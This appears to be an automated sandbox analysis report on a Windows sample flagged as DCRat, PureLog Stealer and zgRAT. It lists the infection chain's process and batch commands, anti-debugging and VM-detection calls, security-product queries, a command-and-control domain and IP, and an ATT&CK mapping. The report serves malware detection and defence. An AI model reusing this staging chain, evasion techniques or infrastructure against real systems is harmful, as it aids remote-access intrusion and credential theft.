                                    Source: KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4118258709.0000000012B6D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Mxc5RNhbsiyZCTX2NviatuckXivc2+cKhxl4fhEDNzeFYMKE1NI+zseZotDnWEOz1JeJ9MV+osTHoC/f1Nfvi4MJRLRhoaAyHQQyiqVioLwpivf6ELxTo1Xzh5t64ry/WCLNfzJ9I9EXHKbQs2sESdBaaZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
                                    Source: KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4120908873.000000001DB90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
                                    Source: wscript.exe, 00000001.00000002.1686536575.0000000002917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}u
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeAPI call chain: ExitProcess graph end nodegraph_0-25066
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FCF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FCF838
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FD7DEE mov eax, dword ptr fs:[00000030h]0_2_00FD7DEE
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FDC030 GetProcessHeap,0_2_00FDC030
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FCF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FCF838
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FCF9D5 SetUnhandledExceptionFilter,0_2_00FCF9D5
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FCFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00FCFBCA
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FD8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FD8EBD
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeMemory allocated: page read and write | page guardJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\surrogateFontdhcpCommon\OneEFBaC8w.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\surrogateFontdhcpCommon\8R9u62iDagU8Uc7aonuPLC09qlpNFRfyF1hoQ7xLsx4xo5Yd8alS.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe "C:\surrogateFontdhcpCommon/ChainPortServerBrowsermonitor.exe"Jump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KhSi255NBg.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe "C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe" Jump to behavior
                                    Source: KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000002DF5000.00000004.00000800.00020000.00000000.sdmp, KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000003311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerH,
                                    Source: KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000003311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.33","US /
                                    Source: KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000003311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{},"5.0.1",5,1,"","user","123716","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Windows\\Temp\\Crashpad\\reports","2E3DBMT9F (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.33","US / United States of America","New York / New York City"," / "]@
                                    Source: KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000003311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{},"5.0.1",5,1,"","user","123716","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Windows\\Temp\\Crashpad\\reports","2E3DBMT9F (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.33","US / United States of America","New York / New York City"," / "]
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FCF654 cpuid 0_2_00FCF654
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00FCAF0F
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeQueries volume information: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe VolumeInformationJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeQueries volume information: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe VolumeInformationJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FCDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00FCDF1E
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FBB146 GetVersionExW,0_2_00FBB146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                    Stealing of Sensitive Information

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000009.00000002.4112284119.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000002.1715284675.0000000013407000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: ChainPortServerBrowsermonitor.exe PID: 7464, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: KSFasOVYpBufeMshBMPdEDfTcvlm.exe PID: 7668, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: cuAvoExY41.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.cuAvoExY41.exe.6e706ef.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.cuAvoExY41.exe.65786ef.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.ChainPortServerBrowsermonitor.exe.b30000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.cuAvoExY41.exe.65786ef.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.cuAvoExY41.exe.6e706ef.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000004.00000000.1685720678.0000000000B32000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1648685230.0000000006E22000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1648218136.000000000652A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\surrogateFontdhcpCommon\upfc.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: cuAvoExY41.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.cuAvoExY41.exe.6e706ef.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.cuAvoExY41.exe.65786ef.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.ChainPortServerBrowsermonitor.exe.b30000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.cuAvoExY41.exe.65786ef.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.cuAvoExY41.exe.6e706ef.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\surrogateFontdhcpCommon\upfc.exe, type: DROPPED

                                    Remote Access Functionality

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000009.00000002.4112284119.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000002.1715284675.0000000013407000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: ChainPortServerBrowsermonitor.exe PID: 7464, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: KSFasOVYpBufeMshBMPdEDfTcvlm.exe PID: 7668, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: cuAvoExY41.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.cuAvoExY41.exe.6e706ef.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.cuAvoExY41.exe.65786ef.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.ChainPortServerBrowsermonitor.exe.b30000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.cuAvoExY41.exe.65786ef.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.cuAvoExY41.exe.6e706ef.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000004.00000000.1685720678.0000000000B32000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1648685230.0000000006E22000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1648218136.000000000652A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\surrogateFontdhcpCommon\upfc.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: cuAvoExY41.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.cuAvoExY41.exe.6e706ef.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.cuAvoExY41.exe.65786ef.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.ChainPortServerBrowsermonitor.exe.b30000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.cuAvoExY41.exe.65786ef.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.cuAvoExY41.exe.6e706ef.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\surrogateFontdhcpCommon\upfc.exe, type: DROPPED

                                    Mitre Att&ck Matrix

                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting                                    		Valid Accounts141
                                    Windows Management Instrumentation                                    		11
                                    Scripting                                    		12
                                    Process Injection                                    		23
                                    Masquerading                                    		OS Credential Dumping1
                                    System Time Discovery                                    		Remote Services1
                                    Archive Collected Data                                    		1
                                    Encrypted Channel                                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts2
                                    Command and Scripting Interpreter                                    		1
                                    DLL Side-Loading                                    		1
                                    DLL Side-Loading                                    		1
                                    Disable or Modify Tools                                    		LSASS Memory351
                                    Security Software Discovery                                    		Remote Desktop ProtocolData from Removable Media2
                                    Non-Application Layer Protocol                                    		Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)251
                                    Virtualization/Sandbox Evasion                                    		Security Account Manager2
                                    Process Discovery                                    		SMB/Windows Admin SharesData from Network Shared Drive12
                                    Application Layer Protocol                                    		Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                                    Process Injection                                    		NTDS251
                                    Virtualization/Sandbox Evasion                                    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    Deobfuscate/Decode Files or Information                                    		LSA Secrets1
                                    Application Window Discovery                                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                                    Obfuscated Files or Information                                    		Cached Domain Credentials1
                                    Remote System Discovery                                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
                                    Software Packing                                    		DCSync1
                                    System Network Configuration Discovery                                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                    DLL Side-Loading                                    		Proc Filesystem3
                                    File and Directory Discovery                                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow157
                                    System Information Discovery                                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                                    Behavior Graph

                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1502155 Sample: cuAvoExY41.exe Startdate: 31/08/2024 Architecture: WINDOWS Score: 100 59 hvatit.top 2->59 63 Suricata IDS alerts for network traffic 2->63 65 Found malware configuration 2->65 67 Antivirus detection for URL or domain 2->67 69 11 other signatures 2->69 11 cuAvoExY41.exe 3 6 2->11         started        signatures3 process4 file5 47 C:\...\ChainPortServerBrowsermonitor.exe, PE32 11->47 dropped 49 C:\surrogateFontdhcpCommon\OneEFBaC8w.vbe, data 11->49 dropped 14 wscript.exe 1 11->14         started        process6 signatures7 81 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->81 17 cmd.exe 1 14->17         started        process8 process9 19 ChainPortServerBrowsermonitor.exe 3 22 17->19         started        23 conhost.exe 17->23         started        file10 39 C:\surrogateFontdhcpCommon\upfc.exe, PE32 19->39 dropped 41 C:\...\KSFasOVYpBufeMshBMPdEDfTcvlm.exe, PE32 19->41 dropped 43 C:\Users\user\Desktop\oOILjGZF.log, PE32 19->43 dropped 45 8 other malicious files 19->45 dropped 71 Antivirus detection for dropped file 19->71 73 Multi AV Scanner detection for dropped file 19->73 75 Machine Learning detection for dropped file 19->75 25 cmd.exe 1 19->25         started        signatures11 process12 signatures13 77 Uses ping.exe to sleep 25->77 79 Uses ping.exe to check the status of other devices and networks 25->79 28 KSFasOVYpBufeMshBMPdEDfTcvlm.exe 14 7 25->28         started        33 conhost.exe 25->33         started        35 PING.EXE 1 25->35         started        37 chcp.com 1 25->37         started        process14 dnsIp15 61 hvatit.top 80.211.144.156, 49732, 49735, 49737 ARUBA-ASNIT Italy 28->61 51 C:\Users\user\Desktop\vnZStDyM.log, PE32 28->51 dropped 53 C:\Users\user\Desktop\mKRcJKjf.log, PE32 28->53 dropped 55 C:\Users\user\Desktop\VDAxqXDQ.log, PE32 28->55 dropped 57 2 other malicious files 28->57 dropped 83 Multi AV Scanner detection for dropped file 28->83 85 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 28->85 87 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 28->87 file16 signatures17

                                    Screenshots

                                    Thumbnails

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand

                                    Antivirus, Machine Learning and Genetic Malware Detection

                                    Initial Sample

                                    SourceDetectionScannerLabelLink
                                    cuAvoExY41.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    cuAvoExY41.exe57%VirustotalBrowse
                                    cuAvoExY41.exe100%AviraVBS/Runner.VPG
                                    cuAvoExY41.exe100%Joe Sandbox ML

                                    Dropped Files

                                    SourceDetectionScannerLabelLink
                                    C:\Users\user\Desktop\EQOQCKPT.log100%AviraTR/PSW.Agent.qngqt
                                    C:\Users\user\Desktop\oOILjGZF.log100%AviraHEUR/AGEN.1300079
                                    C:\Users\user\AppData\Local\Temp\KhSi255NBg.bat100%AviraBAT/Delbat.C
                                    C:\surrogateFontdhcpCommon\OneEFBaC8w.vbe100%AviraVBS/Runner.VPG
                                    C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe100%AviraHEUR/AGEN.1323342
                                    C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\mKRcJKjf.log100%AviraHEUR/AGEN.1300079
                                    C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe100%AviraHEUR/AGEN.1323342
                                    C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe100%AviraHEUR/AGEN.1323342
                                    C:\surrogateFontdhcpCommon\upfc.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\vnZStDyM.log100%AviraTR/PSW.Agent.qngqt
                                    C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\EQOQCKPT.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\dVTvzLpX.log100%Joe Sandbox ML
                                    C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe100%Joe Sandbox ML
                                    C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exe100%Joe Sandbox ML
                                    C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe100%Joe Sandbox ML
                                    C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe100%Joe Sandbox ML
                                    C:\surrogateFontdhcpCommon\upfc.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\UxpXqoOQ.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\vnZStDyM.log100%Joe Sandbox ML
                                    C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe100%Joe Sandbox ML
                                    C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe92%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe55%VirustotalBrowse
                                    C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exe92%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files\Windows Multimedia Platform\WmiPrvSE.exe55%VirustotalBrowse
                                    C:\Users\Public\Libraries\KSFasOVYpBufeMshBMPdEDfTcvlm.exe92%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\Public\Libraries\KSFasOVYpBufeMshBMPdEDfTcvlm.exe55%VirustotalBrowse
                                    C:\Users\user\Desktop\CUGzHwzy.log25%ReversingLabs
                                    C:\Users\user\Desktop\CUGzHwzy.log29%VirustotalBrowse
                                    C:\Users\user\Desktop\EQOQCKPT.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\EQOQCKPT.log69%VirustotalBrowse
                                    C:\Users\user\Desktop\UxpXqoOQ.log8%ReversingLabs
                                    C:\Users\user\Desktop\UxpXqoOQ.log11%VirustotalBrowse
                                    C:\Users\user\Desktop\VDAxqXDQ.log29%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\VDAxqXDQ.log27%VirustotalBrowse
                                    C:\Users\user\Desktop\dVTvzLpX.log8%ReversingLabs
                                    C:\Users\user\Desktop\dVTvzLpX.log11%VirustotalBrowse
                                    C:\Users\user\Desktop\ddDNduPc.log25%ReversingLabs
                                    C:\Users\user\Desktop\ddDNduPc.log29%VirustotalBrowse
                                    C:\Users\user\Desktop\ffpwzeUX.log29%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\ffpwzeUX.log27%VirustotalBrowse
                                    C:\Users\user\Desktop\mKRcJKjf.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\mKRcJKjf.log22%VirustotalBrowse
                                    C:\Users\user\Desktop\oOILjGZF.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\oOILjGZF.log22%VirustotalBrowse
                                    C:\Users\user\Desktop\vnZStDyM.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\vnZStDyM.log69%VirustotalBrowse
                                    C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe92%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe55%VirustotalBrowse
                                    C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe92%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe55%VirustotalBrowse
                                    C:\surrogateFontdhcpCommon\upfc.exe92%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\surrogateFontdhcpCommon\upfc.exe55%VirustotalBrowse

                                    Unpacked PE Files

                                    No Antivirus matches

                                    Domains

                                    SourceDetectionScannerLabelLink
                                    hvatit.top0%VirustotalBrowse

                                    URLs

                                    SourceDetectionScannerLabelLink
